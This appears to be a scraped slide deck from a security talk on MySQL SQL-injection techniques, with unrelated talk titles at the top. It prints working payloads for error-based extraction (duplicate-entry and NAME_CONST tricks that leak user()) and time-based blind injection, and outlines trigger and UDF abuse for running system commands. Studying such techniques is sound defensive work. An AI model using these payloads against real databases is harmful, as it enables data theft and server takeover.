New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 

關於SQL Injection的那些奇技淫巧

  • 3. Havij • Pangolin • DSQL tool • NBSI / HBSI • BSQL Hacker • Domain tools • SQLmap etc……
  • 4. This talk is about MySQL !
  • 5. MySQL Injection (Maybe you know) • Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection • Read / Write – Load_file – Into outfile
  • 6. MySQL Injection (Maybe you know more.) • Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection • Read / Write – Load_file – Into outfile
  • 7. MySQL Development History Feature MySQL Series 1 Unions 4.0 Subqueries 2 4.1 R-trees 4.1 (for the MyISAM storage engine) Stored procedures and functions 3 5.0 Views 5.0 Cursors 5.0 XA transactions 5.0 Triggers 4 5.0 and 5.1 Event scheduler 5.1 Partitioning 5.1 Pluggable storage engine API 5.1 Plugin API 5.1 InnoDB Plugin 5.1 Row-based replication 5.1 Server log tables 5.1
  • 8. MySQL (1/3) • Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection • Read / Write – Load_file – Into outfile
  • 9. Error Base Injection • Like Injection in SQL server • When to use ? – Insert injection – Update injection – 同樣參數在多個 table 查詢中 – Query 的資訊不會顯示在頁面中 • How to implement ? – Duplicate Error – Function Error
  • 10. Select * from (Select 1,1) as x Duplicate column name '1'
  • 11. Select * from (select * from user as a join user as b) as x Duplicate column name 'Host'
  • 12. Select * from (select * from user as a join user as b using(Host)) as x Duplicate column name 'User'
  • 13. Select * from (Select user(),user()) as x Will show user name ?
  • 15. NAME_CONST(name ,value) Causes the column to have the given name.
  • 17. Select * from (Select NAME_CONST(user(),1), NAME_CONST(user(),1)) as x
  • 18. MySQL patched it • MySQL > 5.1 – NAME_CONST() can not use again. – Argument must be const.
  • 19. • select * from (select count(*),concat((select (select user()) from information_schema.tables limit 0,1), floor(rand(0)*2)) as x from information_schema.tables group by x) as a • ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 1
  • 20. What is Duplicate Entry Error?
  • 21. SELECT * FROM ( SELECT COUNT( * ) , CONCAT( USER( ) , FLOOR 2 ( RAND( ) *2 ) ) FROM mysql.user GROUP BY 2 ) AS a 1 • ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 1
  • 22. Demo
  • 23. MySQL (2/3) • Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection • I/O – Load_file – Into outfile
  • 24. Deep Blind Injection • Status 200 or 500 ? • Time base quick or slow ? • a -> 0x97 – 9 -> delay 9 seconds – 7 -> delay 7 seconds • So, one char can be solved in two requests.
  • 25. Deep Blind Injection DECLARE @x as int; DECLARE @w as char(6); SET @x=ASCII(SUBSTRING(master.dbo.fn_varbintohexst r(CAST({QUERY} as varbinary(8000))),{POSITION},1)); IF @x>=97 SET @x=@x-87 ELSE SET @x=@x-48; SET @w='0:0:'+CAST(@x*{SECONDS} as char); WAITFOR DELAY @w
  • 26. Deep Blind Injection • if( ord(substring(hex(user()),1,1))>=97, sleep(ord(substring(hex(user()),1,1))-87), sleep(ord(substring(hex(user()),1,1))-48)) Implemented by BSQL Hacker
  • 27. MySQL (3/3) • Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Triggers • Deep Blind Injection – Union Injection – Error Base Injection • Read / Write – Load_file – Into outfile
  • 28. MySQL Triggers A trigger is a named database object that is associated with a table, and that activates when a particular event occurs for the table.
  • 29. When a triggers created • MySQL/data/database/ – table_name.TRG – atk.TRN • When update/delete/insert will check above file. • Generate by self ?
  • 30. How to Exploit it • Update / Insert data ? • Add a MySQL account ? • Exploit it with UDF ? – Cause the MySQL server stop. – Maybe a Security Feature or a Bug. • A SQL injection can run system command !
  • 31. Demo